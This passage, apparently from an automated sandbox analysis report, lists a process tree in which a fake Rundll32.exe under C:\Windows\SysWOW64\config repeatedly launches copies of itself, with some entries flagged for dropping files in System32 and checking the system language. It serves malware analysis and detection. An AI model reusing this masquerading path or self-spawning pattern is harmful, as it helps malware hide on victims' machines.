C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"65⤵
- Drops file in System32 directory
PID:1096 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"66⤵
- Drops file in System32 directory
PID:4268 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"67⤵
- Drops file in System32 directory
PID:3008 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"68⤵
- Drops file in System32 directory
PID:6036 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"69⤵
- Drops file in System32 directory
PID:4908 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"70⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2428 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"71⤵PID:440
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"72⤵PID:5612
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"73⤵PID:776
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"74⤵PID:5564
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"75⤵PID:2636
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"76⤵PID:332
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"77⤵PID:5472
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"78⤵PID:5268
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"79⤵PID:5300
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"80⤵PID:244
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"81⤵PID:4724
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"82⤵PID:5336
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"83⤵PID:2368
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"84⤵PID:5804
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"85⤵PID:4376
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"86⤵PID:1052
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"87⤵PID:2376
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"88⤵PID:1216
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"89⤵PID:3984
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"90⤵PID:6120
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"91⤵PID:2284
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"92⤵PID:2036
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"93⤵PID:2924
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"94⤵PID:5164
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"95⤵PID:5228
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"96⤵PID:5096
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"97⤵PID:2404
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"98⤵PID:2576
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"99⤵PID:3380
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"100⤵PID:2876
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"101⤵PID:4904
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"102⤵PID:1820
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"103⤵PID:5492
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"104⤵PID:2932
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"105⤵PID:3192
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"106⤵PID:5608
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"107⤵PID:2212
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"108⤵PID:4100
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"109⤵PID:1864
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"110⤵PID:5560
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"111⤵PID:2064
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"112⤵PID:5016
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"113⤵PID:2732
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"114⤵PID:3660
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"115⤵PID:5784
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"116⤵PID:6132
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"117⤵PID:3428
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"118⤵PID:5728
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"119⤵PID:5076
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"120⤵PID:6124
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"121⤵PID:5052
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"122⤵PID:1916
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-